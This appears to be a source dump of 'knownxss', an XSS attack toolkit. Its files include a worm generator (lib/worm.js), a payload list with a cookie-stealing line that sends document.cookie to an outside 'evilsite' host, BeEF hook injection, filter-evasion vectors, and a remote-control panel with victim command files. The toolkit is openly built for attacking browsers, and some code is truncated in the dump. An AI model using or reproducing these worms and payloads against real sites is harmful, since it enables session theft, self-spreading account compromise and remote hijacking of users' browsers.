timers=jQuery.timers;if(clearQueue)this.queue([]);this.each(function(){for(var i=timers.length-1;i>=0;i--)if(timers[i].elem==this){if(gotoEnd)timers[i](true);timers.splice(i,1);}});if(!gotoEnd)this.dequeue();return this;}});var queue=function(elem,type,array){if(!elem)return undefined;type=type||"fx";var q=jQuery.data(elem,type+"queue");if(!q||array)q=jQuery.data(elem,type+"queue",array?jQuery.makeArray(array):[]);return q;};jQuery.fn.dequeue=function(type){type=type||"fx";return this.each(function(){var q=queue(this,type);q.shift();if(q.length)q[0].apply(this);});};jQuery.extend({speed:function(speed,easing,fn){var opt=speed&&speed.constructor==Object?speed:{complete:fn||!fn&&easing||jQuery.isFunction(speed)&&speed,duration:speed,easing:fn&&easing||easing&&easing.constructor!=Function&&easing};opt.duration=(opt.duration&&opt.duration.constructor==Number?opt.duration:{slow:600,fast:200}[opt.duration])||400;opt.old=opt.complete;opt.complete=function(){if(opt.queue!==false)jQuery(this).dequeue();if(jQuery.isFunction(opt.old))opt.old.apply(this);};return opt;},easing:{linear:function(p,n,firstNum,diff){return firstNum+diff*p;},swing:function(p,n,firstNum,diff){return((-Math.cos(p*Math.PI)/2)+0.5)*diff+firstNum;}},timers:[],timerId:null,fx:function(elem,options,prop){this.options=options;this.elem=elem;this.prop=prop;if(!options.orig)options.orig={};}});jQuery.fx.prototype={update:function(){if(this.options.step)this.options.step.apply(this.elem,[this.now,this]);(jQuery.fx.step[this.prop]||jQuery.fx.step._default)(this);if(this.prop=="height"||this.prop=="width")this.elem.style.display="block";},cur:function(force){if(this.elem[this.prop]!=null&&this.elem.style[this.prop]==null)return this.elem[this.prop];var r=parseFloat(jQuery.css(this.elem,this.prop,force));return r&&r>-10000?r:parseFloat(jQuery.curCSS(this.elem,this.prop))||0;},custom:function(from,to,unit){this.startTime=(new Date()).getTime();this.start=from;this.end=to;this.unit=unit||this.unit||"px";this.now=this.start;this.pos=this.state=0;this.update();var self=this;function t(gotoEnd){return self.step(gotoEnd);}t.elem=this.elem;jQuery.timers.push(t);if(jQuery.timerId==null){jQuery.timerId=setInterval(function(){var timers=jQuery.timers;for(var i=0;ithis.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;var done=true;for(var i in this.options.curAnim)if(this.options.curAnim[i]!==true)done=false;if(done){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;this.elem.style.display=this.options.display;if(jQuery.css(this.elem,"display")=="none")this.elem.style.display="block";}if(this.options.hide)this.elem.style.display="none";if(this.options.hide||this.options.show)for(var p in this.options.curAnim)jQuery.attr(this.elem.style,p,this.options.orig[p]);}if(done&&jQuery.isFunction(this.options.complete))this.options.complete.apply(this.elem);return false;}else{var n=t-this.startTime;this.state=n/this.options.duration;this.pos=jQuery.easing[this.options.easing||(jQuery.easing.swing?"swing":"linear")](this.state,n,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update();}return true;}};jQuery.fx.step={scrollLeft:function(fx){fx.elem.scrollLeft=fx.now;},scrollTop:function(fx){fx.elem.scrollTop=fx.now;},opacity:function(fx){jQuery.attr(fx.elem.style,"opacity",fx.now);},_default:function(fx){fx.elem.style[fx.prop]=fx.now+fx.unit;}};jQuery.fn.offset=function(){var left=0,top=0,elem=this[0],results;if(elem)with(jQuery.browser){var parent=elem.parentNode,offsetChild=elem,offsetParent=elem.offsetParent,doc=elem.ownerDocument,safari2=safari&&parseInt(version)<522&&!/adobeair/i.test(userAgent),fixed=jQuery.css(elem,"position")=="fixed";if(elem.getBoundingClientRect){var box=elem.getBoundingClientRect();add(box.left+Math.max(doc.documentElement.scrollLeft,doc.body.scrollLeft),box.top+Math.max(doc.documentElement.scrollTop,doc.body.scrollTop));add(-doc.documentElement.clientLeft,-doc.documentElement.clientTop);}else{add(elem.offsetLeft,elem.offsetTop);while(offsetParent){add(offsetParent.offsetLeft,offsetParent.offsetTop);if(mozilla&&!/^t(able|d|h)$/i.test(offsetParent.tagName)||safari&&!safari2)border(offsetParent);if(!fixed&&jQuery.css(offsetParent,"position")=="fixed")fixed=true;offsetChild=/^body$/i.test(offsetParent.tagName)?offsetChild:offsetParent;offsetParent=offsetParent.offsetParent;}while(parent&&parent.tagName&&!/^body|html$/i.test(parent.tagName)){if(!/^inline|table.*$/i.test(jQuery.css(parent,"display")))add(-parent.scrollLeft,-parent.scrollTop);if(mozilla&&jQuery.css(parent,"overflow")!="visible")border(parent);parent=parent.parentNode;}if((safari2&&(fixed||jQuery.css(offsetChild,"position")=="absolute"))||(mozilla&&jQuery.css(offsetChild,"position")!="absolute"))add(-doc.body.offsetLeft,-doc.body.offsetTop);if(fixed)add(Math.max(doc.documentElement.scrollLeft,doc.body.scrollLeft),Math.max(doc.documentElement.scrollTop,doc.body.scrollTop));}results={top:top,left:left};}function border(elem){add(jQuery.curCSS(elem,"borderLeftWidth",true),jQuery.curCSS(elem,"borderTopWidth",true));}function add(l,t){left+=parseInt(l)||0;top+=parseInt(t)||0;}return results;};})(); -------------------------------------------------------------------------------- /lib/worm.js: -------------------------------------------------------------------------------- 1 | // JavaScript Document 2 | 3 | knownxss.worm = {}; 4 | knownxss.worm.setWorm = function(x){ 5 | if(x!=""){ 6 | _g('set_Worm').disabled=true; 7 | var txt=_g('Ww_B_2_textarea').value; 8 | s=txt.split("\n"); 9 | var yxworm="//type of form: multipart/form-data\n\n"; 10 | yxworm += "function ajax(){\n"; 11 | yxworm += " var request = false;\n"; 12 | yxworm += " if(window.XMLHttpRequest) {\n"; 13 | yxworm += " request = new XMLHttpRequest();\n"; 14 | yxworm += " } else if(window.ActiveXObject) {\n"; 15 | yxworm += " var versions = [\'Microsoft.XMLHTTP\', \'MSXML.XMLHTTP\', \'Microsoft.XMLHTTP\', \'Msxml2.XMLHTTP.7.0\', \'Msxml2.XMLHTTP.6.0\', \'Msxml2.XMLHTTP.5.0\', \'Msxml2.XMLHTTP.4.0\', \'MSXML2.XMLHTTP.3.0\', \'MSXML2.XMLHTTP\'];\n"; 16 | yxworm += " for(var i=0; i1){ 31 | for(i=0;i1){ 61 | for(i=0;i"' 2 | '';!--"=&{()} 3 | '';!--"=&{()} 4 | '';!--"=&{(alert(1))} 5 | `> 6 | 7 | HI 8 | 9 | 10 | 11 | 12 | '"><"' 13 | 14 | 15 | 16 | 17 | new Image().src="http://www.evilsite.com/phishing/cookie.asp?cookie="+escape(document.cookie); 18 | 19 | 20 | 21 | 22 | body{cos:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))} 23 | 24 | a{cos:expression(if(!window.x){alert('xss');window.x=1;})} 25 | a{cos:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29} 26 | body{background:url("javascript:alert('xss')")} 27 | body{background:url(JavAs cr 28 | ipt:alert(0))} 29 | 30 | @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)'; 31 |
32 | 33 | alert(String(/xss/).substr(1,3)) 34 | alert(/xss/.source) 35 | Test 36 | x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)() 37 | Test 38 | Test 39 | 40 |
41 | 42 | javascript:document.scripts[0].src='http://127.0.0.1/yy.js';void(0); 43 | Test 44 | function win(){ 45 | x=window.open('max:downloader'); 46 | setTimeout(function(){x.location=new String("javascript:maxDownload.objDownload.CallAddTask(\"http://www.google.cn/intl/zh-CN/images/logo_cn.gif\",\"\",\"\",0,\"\",\"exp.gif\");") 47 | },3000) 48 | } 49 | function hijack(){ 50 | x=window.open('http://www.baidu.com'); 51 | setTimeout(function(){x.location="javascript:var s=document.createElement('script');s.setAttribute('src','http://beef.js');document.getElementsByTagName('head')[0].appendChild(s);void(0)" 52 | },3000) 53 | } 54 | 56 | javascript:document.cookie=window.prompt("edit cookie:",document.cookie);void(0); 57 | 58 | 59 |
  • 60 |
    61 | XXX 62 | 63 |
    64 | 65 | [!] ie only: 66 |
    x 67 | 68 | <!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(1)//]> --> 69 | 70 | [!] parsing error: 71 | <!--<img src="--><img src=x onerror=alert(1)//"> 72 | <comment><img src="</comment><img src=x onerror=alert(1))//"> 73 | <![><img src="]><img src=x onerror=alert(1)//"> 74 | <style><img src="</style><img src=x onerror=alert(1)//"> 75 | <b <script>alert(1)</script>0 76 | <x '="foo"><x foo='><img src=x onerror=alert(1)//'> 77 | 78 | [!] special tags parsing issues, from: http://html5sec.org/#html 79 | <? foo="><script>alert(1)</script>"> 80 | <! foo="><script>alert(1)</script>"> 81 | </ foo="><script>alert(1)</script>"> 82 | <? foo="><x foo='?><script>alert(1)</script>'>"> 83 | <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> 84 | <% foo><x foo="%><script>alert(1)</script>"> 85 | 86 | [!] fuzzing tips: 87 | <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> 88 | <a href=java script:alert(1)>XXX</a> 89 | 90 | [!] utf-7 bom 91 | +/v8 92 | +/v9 93 | +/v+ 94 | +/v/ 95 | 96 | More will be added...... -------------------------------------------------------------------------------- /style/main.css: -------------------------------------------------------------------------------- 1 | /*code by yuxi4n*/ 2 | 3 | body{margin:0px;font-size:12px;color:#FFF;background:#333;} 4 | body a,a:link,a:visited{color:#108AC6;text-decoration:none;} 5 | body a:hover{color:#FFF;} 6 | ul,li{margin:0px;padding:0px;} 7 | textarea{font-size:13px;} 8 | pre{word-break:break-all;} 9 | 10 | #Ww_BOX{margin:0 auto;width:980px;} 11 | #Ww_Head{position:relative;width:980px;height:70px;border-bottom:1px solid #999;} 12 | #Db_MainNav{position:absolute;list-style:none;left:0px;bottom:0px;float:left;} 13 | #Db_MainNav li{float:left;} 14 | #Db_MainNav li a,a:link,a:visited{display:block;padding:4px;font-size:14px;color:#EEE;} 15 | .active_li{background:#FFF;} 16 | #Ww_Body{width:980px;height:500px;overflow:hidden;} 17 | .Ww_B{margin-top:10px;} 18 | /*Encode/Decode Ww_B_0*/ 19 | #Ww_B_0_Left{width:710px;height:500px;float:left;} 20 | #Ww_B_0_textarea{width:704px;height:450px;} 21 | #Ww_B_0_Right{width:265px;height:500px;float:left;overflow:hidden;padding-left:5px;} 22 | /*XSSCodz Ww_B_1*/ 23 | /*.Ww_B_list{width:970px;margin:0 4px;height:210px;border:1px solid #999;overflow:hidden;overflow-y:scroll;}*/ 24 | .Ww_B_list{width:970px;margin:0 4px;height:210px;border:1px solid #BBB;border-top:1px solid #CCC;} 25 | .Ww_B_table th{background:#999;color:#FFF;text-align:left;font-weight:normal;padding-left:2px;line-height:16px;font-size:14px;height:30px;} 26 | .Ww_B_table td{padding-left:2px;height:16px;white-space:nowrap;word-break:break-all;overflow:hidden;} 27 | .Ww_B_table tr.alt td{background:#FFF;} 28 | .Ww_B_table tr.over td{background:#BCD4EC;} 29 | .Ww_B_table tr.cli td{background:#E6FEBC;} 30 | .Ww_B_table tr.cutoffl td{background:#CCC;} 31 | #Ww_B_1_Top{width:980px;height:228px;float:left;} 32 | #Ww_B_1_textarea{width:974px;height:200px;} 33 | #Ww_B_1_Bottom{width:980px;height:244px;float:left;} 34 | #XSSCodz_textarea{width:974px;height:238px;} 35 | /*WormAction Ww_B_2*/ 36 | #Ww_B_2_Left{width:710px;height:500px;float:left;} 37 | #Ww_B_2_textarea{width:704px;height:450px;} 38 | #Ww_B_2_Right{width:268px;margin-left:2px;height:500px;float:left;overflow:hidden;} 39 | /*RemoteControl Ww_B_3*/ 40 | #cmd_div_left{width:670px;height:400px;float:left;overflow:hidden;} 41 | #cmd{width:664px;height:390px;} 42 | #cmd_div_right{width:310px;height:400px;float:left;overflow:hidden;} 43 | #victim_id{width:200px;height:16px;margin:0 4px;} 44 | #victim_list{width:300px;height:367px;margin:4px;border:1px solid #F4FEC0;background:#F7FFEE;color:#333;} 45 | 46 | /*CSRFCodz Ww_B_4*/ 47 | #Ww_B_4_Top{width:980px;height:250px;float:left;} 48 | #csrfurl{width:378px;height:16px;} 49 | #csrfvalue{width:500px;height:16px;} 50 | #Ww_B_4_textarea{width:974px;height:200px;} 51 | #Ww_B_4_Bottom{width:980px;height:206px;float:left;} 52 | #csrf_textarea{width:974px;height:200px;} 53 | 54 | /*About Ww_B_5*/ 55 | #Ww_B_4_list0{height:470px;} 56 | #Ww_B_4_Top{width:980px;float:left;} 57 | 58 | #sys_tip{position:absolute;left:0px;top:0px;display:block;width:auto;height:18px;padding:5px 2px 0px 2px;background:#DF0451;color:#FFF;} -------------------------------------------------------------------------------- /victim/rtcmd.txt: -------------------------------------------------------------------------------- 1 | injectScript('http://127.0.0.1:8088/knownxss/lib/inject.js'); 2 | setTimeout("injectIframe('http://127.0.0.1/hi.html')",1000); 3 | -------------------------------------------------------------------------------- /victim/wait.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1127.0.0.1 --------------------------------------------------------------------------------